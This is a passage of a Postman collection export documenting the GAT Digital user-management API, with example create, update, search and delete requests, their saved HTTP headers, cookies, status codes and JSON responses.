\"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":true,"value":"node0ewlu71ibu4gmdwuqqrcm3kcj748.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":false,"value":"d7302208-23ba-421b-bbde-0de9f67d80f2","key":"XSRF-TOKEN"}],"responseTime":null,"body":""},{"id":"f446a05e-a8a5-4da6-b7e7-0632e9d5460a","name":"Search all Users with the specified profile_id","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8","description":"Your API Key"}],"body":{"mode":"raw","raw":"{\n\t\"email\": [],\n\t\"enabled\": true,\n\t\"name\": [],\n\t\"profile_id\": [\"59ccf3bce03dd800655d360e\"],\n\t\"team_id\": [],\n\t\"team_name\": [],\n\t\"user_id\": [],\n\t\"username\": []\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/users?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","users"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Fri, 14 Jun 2019 09:58:10 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0ercd6o6hti5z1vt2salpz53db742.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01uypkvwjgmdax1n43o9mj7v507743.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=ca4414de-314b-4d73-a450-96a283ad728c;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":true,"value":"node01uypkvwjgmdax1n43o9mj7v507743.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":false,"value":"ca4414de-314b-4d73-a450-96a283ad728c","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"content\": [\n        {\n            \"email\": \"name1.surname1@example.com\",\n            \"username\": \"name1.surname1@example.com\",\n            \"name\": \"Name1 Surname1\",\n            \"team\": [\n                \"5c06b42f5ced7f075e0a3ef5\",\n                \"5c8b857e5ced7f0a9bcaa14c\"\n            ],\n            \"enabled\": true,\n            \"user_id\": \"5c06b3ed5ced7f075e0a3ef1\",\n            \"profile_id\": \"59ccf3bce03dd800655d360e\",\n            \"bu_root\": false\n        },\n        {\n            \"email\": \"name2.surname2@example.com\",\n            \"username\": \"name2.surname2@example.com\",\n            \"name\": \"Name2 Surname2\",\n            \"team\": [\n                \"5c06b51a5ced7f075e0a3f82\"\n            ],\n            \"enabled\": true,\n            \"user_id\": \"5c06b4e75ced7f075e0a3f7c\",\n            \"profile_id\": \"59ccf3bce03dd800655d360e\",\n            \"bu_root\": false\n        }\n    ],\n    \"pageable\": {\n        \"sort\": {\n            \"sorted\": true,\n            \"unsorted\": false\n        },\n        \"pageSize\": 30,\n        \"pageNumber\": 0,\n        \"offset\": 0,\n        \"paged\": true,\n        \"unpaged\": false\n    },\n    \"last\": true,\n    \"totalPages\": 1,\n    \"totalElements\": 2,\n    \"first\": true,\n    \"sort\": {\n        \"sorted\": true,\n        \"unsorted\": false\n    },\n    \"numberOfElements\": 2,\n    \"size\": 30,\n    \"number\": 0\n}"}],"_postman_id":"f39d37a5-e5a3-4b14-b8ad-6219b1c23ed9"},{"name":"Create a New User","id":"998220e2-a0aa-474c-a4b4-4aed8993defd","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8","description":"<p>Your API Key.</p>\n"}],"body":{"mode":"formdata","formdata":[{"key":"email","value":"String","description":"<p>[required] The User's email address.</p>\n","type":"text"},{"key":"name","value":"String","description":"<p>[required] The real name of the User.</p>\n","type":"text"},{"key":"profile_id","value":"String","description":"<p>[required] The ID of the Profile for the User.</p>\n","type":"text"},{"key":"bu_root","value":"Bool","description":"<p>[optional] Whether the User will be Business Unit root or not. Default is false.</p>\n","type":"text"},{"key":"expiration_date","value":"String","description":"<p>[optional] A date in the format \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"username","value":"String","description":"<p>[optional] If not set, it will be the same value as the email address.</p>\n","type":"text"}]},"url":"https://<instance>/api/v1/users","description":"<p>Esse <em>endpoint</em> te permite criar um novo Usuário. É importante notar que, ao ser criado um novo Usuário, o processo de ativação do mesmo segue o mesmo fluxo da interface Web. Ou seja, o novo Usuário irá receber um email automaticamente com um link para a criação de sua senha.</p>\n","urlObject":{"protocol":"https","path":["api","v1","users"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"f2ee069e-558b-4579-94cc-294a37f4fc1c","name":"Malformed request body","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"bu_root\": true,\n\t\"enabled\": true,\n\t\"email\": \"new.user2@example.com\",\n\t\"expiration_date\": \"2020-12-20T21:04:50\",\n\t\"profile_id\": \"5beb2c97b2aac522587a8942\",\n\t\"username\": \"new.person2\"\n}"},"url":"https://subdomain.gat.digital/api/v1/users"},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Fri, 14 Jun 2019 10:36:56 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01owwjcnnagmxd1lzn28zrt3p2c751.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node017wgwsf2h8d61ux4lhg2rpzva752.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=0dc2529b-91f9-4493-8ad2-3a9539582274;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":true,"value":"node017wgwsf2h8d61ux4lhg2rpzva752.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":false,"value":"0dc2529b-91f9-4493-8ad2-3a9539582274","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"error\":\"Malformed request body\",\"error_key\":\"error.null.params\"}"},{"id":"8d17f76c-0842-4b33-a078-14ba0619edbf","name":"Create a New User","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"bu_root\": true,\n\t\"email\": \"new.person@email.com\",\n\t\"enabled\": true,\n\t\"expiration_date\": \"2018-12-20T21:04:50\",\n\t\"name\": \"New Person\",\n\t\"profile_id\": \"59ccf3bce03dd800655d360e\",\n\t\"username\": \"new.person\"\n}"},"url":"https://subdomain.gat.digital/api/v1/users"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Fri, 14 Jun 2019 10:32:46 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0ewlu71ibu4gmdwuqqrcm3kcj748.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01gznj6zhl8ld88wslzvlmag4749.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=652e5614-8a2f-4c5f-b878-7a3846b2ca01;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":true,"value":"node01gznj6zhl8ld88wslzvlmag4749.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":false,"value":"652e5614-8a2f-4c5f-b878-7a3846b2ca01","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"email\":\"new.person@email.com\",\"username\":\"new.person\",\"name\":\"New Person\",\"enabled\":false,\"user_id\":\"5d0377cd5ced7f4b09a8afed\",\"profile_id\":\"59ccf3bce03dd800655d360e\",\"bu_root\":true}"},{"id":"7f796f07-3955-4530-b43f-1ac62b231ff0","name":"User already exists","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"bu_root\": true,\n\t\"enabled\": true,\n\t\"email\": \"new.user@example.com\",\n\t\"expiration_date\": \"2020-12-20T21:04:50\",\n\t\"profile_id\": \"5beb2c97b2aac522587a8942\",\n\t\"name\": \"New User\",\n\t\"username\": \"new.person\"\n}"},"url":"https://subdomain.gat.digital/api/v1/users"},"status":"Conflict","code":409,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Fri, 14 Jun 2019 10:37:40 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node017wgwsf2h8d61ux4lhg2rpzva752.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node07zt1zn2sbaj3ri526exh61jw753.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=2bd38305-3ded-4cf8-a6f6-0c9707e1f455;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":true,"value":"node07zt1zn2sbaj3ri526exh61jw753.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":false,"value":"2bd38305-3ded-4cf8-a6f6-0c9707e1f455","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"error\":\"USER ALREADY EXISTS IN DATABASE\"}"}],"_postman_id":"998220e2-a0aa-474c-a4b4-4aed8993defd"},{"name":"Update a given User","id":"8b9988e3-4739-422a-acb4-2a5144c58f42","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PATCH","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8","description":"<p>Your API Key.</p>\n"}],"body":{"mode":"formdata","formdata":[{"key":"bu_root","value":"Bool","description":"<p>Whether the User will be Business Unit root or not.</p>\n","type":"text"},{"key":"email","value":"String","description":"<p>The User's email address.</p>\n","type":"text"},{"key":"enabled","value":"Bool","description":"<p>Whether the User is enabled or not.</p>\n","type":"text"},{"key":"expiration_date","value":"String","description":"<p>A date in the format \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"name","value":"String","description":"<p>The real name of the User.</p>\n","type":"text"},{"key":"profile_id","value":"String","description":"<p>The ID of the Profile for the User.</p>\n","type":"text"},{"key":"username","value":"String","description":"<p>The username of the User.</p>\n","type":"text"}]},"url":"https://<instance>/api/v1/users/<user_id>","description":"<p>Esse <em>endpoint</em> te permite atualizar um Usuário já existente. Importa notar que nem todos os campos podem ser atualizados.</p>\n","urlObject":{"protocol":"https","path":["api","v1","users","<user_id>"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"5da16806-cca7-4804-a615-7edeebf35ffc","name":"Add Expiration Date to User","originalRequest":{"method":"PATCH","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"expiration_date\": \"2020-12-20T21:04:50\"\n}"},"url":"https://subdomain.gat.digital/api/v1/users/5d0377cd5ced7f4b09a8afed"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Fri, 14 Jun 2019 10:57:49 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01336hqute26mc1rhlcc4nfdfj0758.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0sk2tmg7jc3nizr1p918hq96v759.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=acaa2529-ae8a-4313-9502-ad5b57b3241b;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":true,"value":"node0sk2tmg7jc3nizr1p918hq96v759.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":false,"value":"acaa2529-ae8a-4313-9502-ad5b57b3241b","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"email\":\"new.person@email.com\",\"username\":\"new.person\",\"name\":\"New Person\",\"enabled\":false,\"user_id\":\"5d0377cd5ced7f4b09a8afed\",\"profile_id\":\"59ccf3bce03dd800655d360e\",\"bu_root\":true,\"expiration_date\":\"2020-12-20T21:04:50\"}"},{"id":"c0053c7e-3b51-44d3-b7ea-2e58a86c6657","name":"Wrong data type in parameter","originalRequest":{"method":"PATCH","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"expiration_date\": [\"2020-12-20T21:04:50\"]\n}"},"url":"https://subdomain.gat.digital/api/v1/users/5d0377cd5ced7f4b09a8afed"},"status":"Bad Request","code":400,"_postman_previewlanguage":"plain","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Date","value":"Fri, 14 Jun 2019 11:02:55 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0wao4mt71x03y1oivpkwjkzr22760.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node05v1k016x9djsy2vsnzb63j4y761.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=aec00e46-d53d-4639-bfbd-9975006de9c4;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":true,"value":"node05v1k016x9djsy2vsnzb63j4y761.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":false,"value":"aec00e46-d53d-4639-bfbd-9975006de9c4","key":"XSRF-TOKEN"}],"responseTime":null,"body":""},{"id":"4e342453-4b30-4981-963a-83262559e507","name":"Try to update a User with wrong User ID","originalRequest":{"method":"PATCH","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"expiration_date\": \"2020-12-20T21:04:50\"\n}"},"url":"https://subdomain.gat.digital/api/v1/users/abcde1234"},"status":"Not Found","code":404,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Fri, 14 Jun 2019 11:02:04 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0sk2tmg7jc3nizr1p918hq96v759.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0wao4mt71x03y1oivpkwjkzr22760.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=1c747ff1-821e-4b57-85cf-60c1c09e51cd;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":true,"value":"node0wao4mt71x03y1oivpkwjkzr22760.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":false,"value":"1c747ff1-821e-4b57-85cf-60c1c09e51cd","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"error\":\"User not found.\"}"}],"_postman_id":"8b9988e3-4739-422a-acb4-2a5144c58f42"},{"name":"Delete given Users","id":"5f1f7943-af7f-4570-b354-542309d06ba5","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8","description":"<p>Your API Key.</p>\n"}],"body":{"mode":"formdata","formdata":[{"key":"id","value":"List<String>","description":"<p>A list of User IDs.</p>\n","type":"text"}]},"url":"https://<instance>/api/v1/users","description":"<p>Esse <em>endpoint</em> recebe um lista de IDs de Usuários, os quais serão removidos do GAT.</p>\n","urlObject":{"protocol":"https","path":["api","v1","users"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"30cc2bdf-72d7-4841-9b7b-c79b13b824ce","name":"Delete given Users","originalRequest":{"method":"DELETE","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8","description":"Your API Key."}],"body":{"mode":"raw","raw":"{\n\t\"id\": [\"5bd780525ced7f65c39ceacd\", \"5bb61ea85ced7f6a7f0a0ae0\"]\n}"},"url":"https://subdomain.gat.digital/api/v1/users"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Fri, 14 Jun 2019 10:47:38 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01bnlzpvou8dtz1tff5q3t7em5f755.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0zki3n02p2q09xzpq2c8yr4ak756.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=06a14939-1272-43e1-a6d9-1a96f32f0d33;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, 